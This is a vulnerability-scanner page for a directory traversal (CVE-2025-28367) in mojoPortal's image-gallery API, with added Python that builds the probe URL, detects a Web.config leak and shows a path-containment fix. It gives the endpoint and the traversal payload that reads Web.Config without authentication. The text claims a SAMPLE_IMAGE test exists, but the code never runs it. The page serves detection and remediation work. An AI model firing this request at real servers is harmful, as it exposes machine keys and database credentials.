CVE-2025-28367 Scanner

CVE-2025-28367 Scanner - Directory Traversal vulnerability in mojoPortal

Short Info

Level: Medium
Single Scan: Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 9 days 21 hours
Scan only one: URL
Toolbox: -

mojoPortal is an open-source, cross-platform web content management system (CMS) built on ASP.NET. Developers and organizations use it to build dynamic websites and portals with features such as blogs, forums, and media galleries. It is typically deployed on Windows servers and runs in a range of .NET-compatible hosting environments. Developers value it for its ease of integration, extensibility, and modular architecture, including APIs for customization and plugin development. Although official support has been discontinued, it remains in use in legacy systems and internal applications.

The Directory Traversal vulnerability in mojoPortal allows an attacker to read sensitive files on the server. The flaw is in the BetterImageGallery API controller, specifically the ImageHandler action, where the path parameter is not securely sanitized. By manipulating this parameter, an attacker can traverse outside the intended image directory and read configuration files such as Web.Config, which may contain encryption keys and credentials. No authentication is required; a single crafted request triggers the issue.

Technically, the vulnerability is reached through a GET request to the `/api/BetterImageGallery/imagehandler` endpoint with the `path` parameter. When a value such as `../../../Web.Config` is supplied, the application neither validates nor canonicalizes it, so the handler reads a file outside the image directory. Successful exploitation returns a 200 OK response containing the contents of Web.Config; characteristic Web.Config XML elements in the response body confirm the exposure. This behavior indicates that input validation is missing or improperly implemented in the API logic.
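The following is an added example, written for this page; it is neither the scanner vendor's check nor mojoPortal's code. It builds the crafted request described above, classifies a response as a Web.Config disclosure, and, as a contrast, shows the path-containment check that a fixed handler would need. The endpoint and parameter name come from the page; the XML markers (`<configuration>`, `<machineKey>`, `<connectionStrings>`) are standard ASP.NET Web.config elements chosen here as indicators, the sample responses are constructed, and the `fetch` callback is injected so the whole thing runs offline.

```python
"""Probe builder, response classifier, and reference path-containment check
for the mojoPortal BetterImageGallery traversal.  Added example, not the
page's or the project's code; see the lead-in for what is assumed."""
import re
from posixpath import normpath
from typing import Callable, Optional, Tuple
from urllib.parse import urlencode

ENDPOINT = "/api/BetterImageGallery/imagehandler"   # from the page
PROBE_PATH = "../../../Web.Config"                  # payload from the page

# Indicators of a disclosed ASP.NET Web.config (assumption: standard element
# names, not something the page states).  The root element is the decisive
# marker; the other two are the high-value sections the page warns about.
STRONG_MARKER = re.compile(r"<configuration[\s>]", re.I)
SENSITIVE_MARKERS = {
    "machineKey": re.compile(r"<machineKey\b", re.I),
    "connectionStrings": re.compile(r"<connectionStrings\b", re.I),
}


def build_probe_url(base_url: str) -> str:
    """Crafted GET URL for a target base such as https://host or https://host/."""
    return base_url.rstrip("/") + ENDPOINT + "?" + urlencode({"path": PROBE_PATH})


def classify_response(status: int, body: str) -> dict:
    """A 200 whose body carries the Web.config root element is a disclosure;
    anything else (error page, an actual image, empty body) is not."""
    vulnerable = status == 200 and bool(STRONG_MARKER.search(body))
    exposed = [name for name, rx in SENSITIVE_MARKERS.items()
               if vulnerable and rx.search(body)]
    return {"vulnerable": vulnerable, "exposed_sections": exposed}


def scan(base_url: str, fetch: Callable[[str], Tuple[int, str]]) -> dict:
    """fetch(url) -> (status, body) is injected so no network is needed."""
    url = build_probe_url(base_url)
    status, body = fetch(url)
    result = classify_response(status, body)
    result["url"] = url
    return result


def resolve_within_root(image_root: str, user_path: str) -> Optional[str]:
    """Reference fix pattern (assumed; not mojoPortal's actual patch): resolve
    the user-supplied path against the image root after normalizing separators
    and refuse any result that escapes the root.  Returns the safe absolute
    path, or None when the request must be rejected."""
    root = normpath(image_root).rstrip("/") + "/"
    relative = user_path.replace("\\", "/").lstrip("/")   # Windows hosts use '\'
    candidate = normpath(root + relative)
    return candidate if candidate.startswith(root) else None


# Constructed sample responses (not captured from any real target).
SAMPLE_LEAK = """<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="db" connectionString="server=db;uid=app;pwd=REDACTED" />
  </connectionStrings>
  <system.web>
    <machineKey validationKey="0000" decryptionKey="0000" validation="HMACSHA256" />
  </system.web>
</configuration>"""
SAMPLE_IMAGE = "\x89PNG\r\n\x1a\n...constructed image bytes..."


def fake_fetch_vulnerable(url: str) -> Tuple[int, str]:
    return 200, SAMPLE_LEAK


def fake_fetch_patched(url: str) -> Tuple[int, str]:
    return 400, "Invalid path"


if __name__ == "__main__":
    for name, fetch in (("vulnerable", fake_fetch_vulnerable),
                        ("patched", fake_fetch_patched)):
        print(name, scan("https://example.test", fetch))
    print(resolve_within_root("/var/www/images", PROBE_PATH))
    print(resolve_within_root("/var/www/images", "gallery/photo.jpg"))
```

The classifier deliberately keys on the `<configuration>` root element rather than on the 200 status alone, because a handler that serves a real image also answers 200; the test with `SAMPLE_IMAGE` covers that false-positive case. The containment check refuses both `../` and backslash variants, which matters because mojoPortal is usually hosted on Windows.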

If this vulnerability is exploited, an attacker can read Web.Config and with it the application's sensitive configuration. That includes the MachineKey, which ASP.NET uses to encrypt and validate its own tokens; with the key in hand, an attacker can forge authentication tokens and escalate privileges. Other confidential settings, such as database connection strings, may also be disclosed. Together these can lead to full compromise of the application, and the risk is amplified because the attack requires no authentication.
